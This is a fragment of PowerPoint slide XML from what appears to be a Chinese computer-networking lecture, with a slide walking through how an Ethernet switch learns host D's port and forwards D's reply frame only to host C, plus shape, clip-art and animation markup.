          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2530475" y="3244850"/>
            <a:ext cx="582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7" name="Rectangle 36"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4252913" y="32019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8" name="Rectangle 37"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6069013" y="31511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9" name="Rectangle 38"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4368800" y="2016125"/>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6420" name="Rectangle 39"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="965200" y="33035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6421" name="Rectangle 40"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1646238" y="4076700"/>
            <a:ext cx="328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6422" name="Rectangle 41"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2303463" y="40894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6423" name="Rectangle 42"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3114675" y="39100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6424" name="Rectangle 43"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3990975" y="4167188"/>
            <a:ext cx="327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6425" name="Rectangle 44"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4633913" y="3883025"/>
            <a:ext cx="322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6426" name="Rectangle 45"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5175250" y="4025900"/>
            <a:ext cx="33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6427" name="Rectangle 46"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6038850" y="41021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6428" name="Rectangle 47"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6784975" y="3548063"/>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6429" name="Line 48"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6813550" y="2319338"/>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30" name="Line 49"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7688263" y="1970088"/>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31" name="Rectangle 50"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7670800" y="1908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a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>接口</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16432" name="Rectangle 51"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7777163" y="2349500"/>
            <a:ext cx="33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3</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16433" name="Rectangle 52"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3527425" y="22479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6434" name="Rectangle 53"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3848100" y="2532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6435" name="Rectangle 54"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4273550" y="24923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16436" name="Rectangle 55"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6534150" y="1911350"/>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411704" name="Line 56"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="2352675" y="2365375"/>
            <a:ext cx="1479550" cy="90170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7"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1670050" y="3395663"/>
            <a:ext cx="901700" cy="449262"/>
            <a:chOff x="1052" y="2139"/>
            <a:chExt cx="568" cy="283"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16449" name="Line 58"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1" flipV="1">
              <a:off x="1052" y="2139"/>
              <a:ext cx="283"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50" name="Line 59"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="1134" y="2248"/>
              <a:ext cx="210" cy="174"/>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51" name="Line 60"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1563" y="2239"/>
              <a:ext cx="57" cy="173"/>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1709" name="Line 61"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4456113" y="2036763"/>
            <a:ext cx="2046287" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="5715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710" name="Line 62"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="3556000" y="3454400"/>
            <a:ext cx="279400" cy="174625"/>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63"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3805238" y="3482975"/>
            <a:ext cx="668337" cy="522288"/>
            <a:chOff x="2397" y="2194"/>
            <a:chExt cx="421" cy="329"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16447" name="Line 64"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="2397" y="2285"/>
              <a:ext cx="72" cy="2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48" name="Line 65"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2698" y="2194"/>
              <a:ext cx="120" cy="19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42" name="Text Box 66"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7199313" y="3903663"/>
            <a:ext cx="973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C     1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="411715" name="Line 67"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="4022725" y="2395538"/>
            <a:ext cx="15875" cy="91281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44" name="Rectangle 68"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7197725" y="2351088"/>
            <a:ext cx="420688"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E</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G</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="411717" name="Rectangle 69"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7140575" y="3949700"/>
            <a:ext cx="1117600" cy="363538"/>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411718" name="Text Box 70"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7199313" y="4411663"/>
            <a:ext cx="973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D     2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
              <a:latin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1710"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4117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1715"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4117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1709"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(left)">
                                      <p:cBhvr>
                                        <p:cTn id="22" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="41170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17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17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11704"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(right)">
                                      <p:cBhvr>
                                        <p:cTn id="35" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="41170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1652">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="45" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="411652">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116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11652">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="51" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="411652">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16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1652">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="57" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="411652">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116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11652">
                                            <p:txEl>
                                              <p:pRg st="3" end="3"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="63" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="411652">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116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704" grpId="0" animBg="1"/>
      <p:bldP spid="411709" grpId="0" animBg="1"/>
      <p:bldP spid="411710" grpId="0" animBg="1"/>
      <p:bldP spid="411715" grpId="0" animBg="1"/>
      <p:bldP spid="411717" grpId="0" animBg="1"/>
      <p:bldP spid="411718"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9"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7420"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9F400D2D-B71A-4601-A6B4-2FAD3B61EB7E}"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6397" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="495300" y="0"/>
            <a:ext cx="7772400" cy="1143000"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1" smtClean="0"/>
              <a:t>交换机举例</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3600" b="1" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16398" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="550863" y="1139825"/>
            <a:ext cx="7772400" cy="4648200"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="ZapfDingbats"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" smtClean="0"/>
              <a:t>假设</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" smtClean="0"/>
              <a:t>D</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" smtClean="0"/>
              <a:t>回复数据帧给</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" smtClean="0"/>
              <a:t>C. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="ZapfDingbats"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="411652" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="714375" y="4664075"/>
            <a:ext cx="77724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交换机接收来自</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的数据帧</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记录</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="仿宋_GB2312"/>
                <a:cs typeface="仿宋_GB2312"/>
              </a:rPr>
              <a:t>D</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="仿宋_GB2312"/>
                <a:cs typeface="仿宋_GB2312"/>
              </a:rPr>
              <a:t>所对应的接口号为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="仿宋_GB2312"/>
                <a:cs typeface="仿宋_GB2312"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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因为</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在交换表中，并且接口为</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，则交换机只向接口</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转发数据帧</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="仿宋_GB2312"/>
              <a:cs typeface="仿宋_GB2312"/>
            </a:endParaRPr>
          </a:p>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数据帧被</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="仿宋_GB2312"/>
                <a:cs typeface="仿宋_GB2312"/>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="仿宋_GB2312"/>
                <a:cs typeface="仿宋_GB2312"/>
              </a:rPr>
              <a:t>接收</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="仿宋_GB2312"/>
              <a:cs typeface="仿宋_GB2312"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16400"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6038" y="33401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6" name="Object 6"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1692275" y="3789363"/>
          <a:ext cx="409575" cy="319087"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s640479" name="Clip" r:id="rId2" imgW="408940" imgH="318770" progId="MS_ClipArt_Gallery.2">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId2" imgW="408940" imgH="318770" progId="MS_ClipArt_Gallery.2">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="0" name="图片 6404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8936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7"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4259263" y="3800475"/>
          <a:ext cx="409575" cy="319088"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s640480" name="Clip" r:id="rId4" imgW="408940" imgH="318770" progId="MS_ClipArt_Gallery.2">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId4" imgW="408940" imgH="318770" progId="MS_ClipArt_Gallery.2">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="0" name="图片 64047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3" y="3800475"/>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8" name="Object 8"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5032375" y="3759200"/>
          <a:ext cx="407988" cy="319088"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s640481" name="Clip" r:id="rId6" imgW="407670" imgH="318770" progId="MS_ClipArt_Gallery.2">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId6" imgW="407670" imgH="318770" progId="MS_ClipArt_Gallery.2">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="0" name="图片 64048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37592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9"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1247775" y="3311525"/>
          <a:ext cx="407988" cy="319088"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s640482" name="Clip" r:id="rId8" imgW="407670" imgH="318770" progId="MS_ClipArt_Gallery.2">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId8" imgW="407670" imgH="318770" progId="MS_ClipArt_Gallery.2">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="0" name="图片 64048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7775" y="331152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401"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3875" y="33480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4238" y="3338513"/>
            <a:ext cx="457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12"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3213100" y="3662363"/>
          <a:ext cx="407988" cy="319087"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s640483" name="Clip" r:id="rId12" imgW="342900" imgH="260985" progId="MS_ClipArt_Gallery.2">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId12" imgW="342900" imgH="260985" progId="MS_ClipArt_Gallery.2">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="0" name="图片 64048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3100" y="366236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13"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3627438" y="4094163"/>
          <a:ext cx="407987" cy="319087"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s640484" name="Clip" r:id="rId14" imgW="342900" imgH="260985" progId="MS_ClipArt_Gallery.2">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId14" imgW="342900" imgH="260985" progId="MS_ClipArt_Gallery.2">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="0" name="图片 64048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4094163"/>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14"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6418263" y="3633788"/>
          <a:ext cx="407987" cy="319087"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s640485" name="Clip" r:id="rId16" imgW="407670" imgH="318770" progId="MS_ClipArt_Gallery.2">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId16" imgW="407670" imgH="318770" progId="MS_ClipArt_Gallery.2">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="0" name="图片 64048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8263" y="36337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15"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5702300" y="3967163"/>
          <a:ext cx="407988" cy="320675"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s640486" name="Clip" r:id="rId18" imgW="407670" imgH="320675" progId="MS_ClipArt_Gallery.2">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId18" imgW="407670" imgH="320675" progId="MS_ClipArt_Gallery.2">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="0" name="图片 64048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300" y="3967163"/>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4" name="Object 16"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2263775" y="3825875"/>
          <a:ext cx="407988" cy="319088"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
